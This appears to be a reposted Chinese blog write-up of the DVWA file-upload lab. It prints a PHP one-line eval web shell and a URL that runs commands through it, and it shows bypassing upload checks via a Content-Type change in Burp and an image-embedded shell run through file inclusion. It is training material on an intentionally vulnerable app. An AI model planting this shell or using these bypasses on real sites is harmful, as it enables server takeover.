常见的一句话木马:
<?php @eval($_POST['shell']); ?>
最外层的是 <?php和?> 这是php文件的起始和结束标记,
php会解析执行 <?php ?>里面的代码。
然后是eval函数,eval()函数把字符串按照 PHP 代码来计算,简单来说就是它可以执行php代码。
里面$_POST[‘shell’]代表用POST提交参数为shell的值。
没有任何校验,想传什么就传什么。
代码如下:
<?php
@eval($_POST['shell']);
?>
文件保存在根目录/hackable/uploads/shell.php下。
localhost/dvwa/hackable/uploads/1.php?shell= phpinfo();
可以以shell为参数执行php命令。
例如:
可以在shell=echo(exec());里面执行系统命令并且输出到页面。
例如:
中国蚁剑是一款跨平台的开源网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
添加数据:
然后就获得权限,可以进行数据管理,输入命令等操作。图如下:
查看源码发现对uploaded_type,也就是http报文的Content-Type字段进行了校验,只能是image/jpeg和image/png。
用burp抓包,把Content-Type字段值改为image/jpeg即可绕过,成功上传文件。
查看源码发现真的只能上传jpg和png图片了
所以尝试上传图片马,打开一个正常的图片,在图片尾部写入一句话木马
然后利用文件包含来进行执行命令
不知道为啥连接不到蚁剑,如果有懂的人希望给我讲一下。
对上传文件md5重命名了,还对后缀名、文件类型、文件大小进行了限制和检查,杜绝了上传木马文件的机会。
版权说明 : 本文为转载文章, 版权归原作者所有 版权申明
原文链接 : https://blog.csdn.net/weixin_49125123/article/details/122025890
内容来源于网络,如有侵权,请联系作者删除!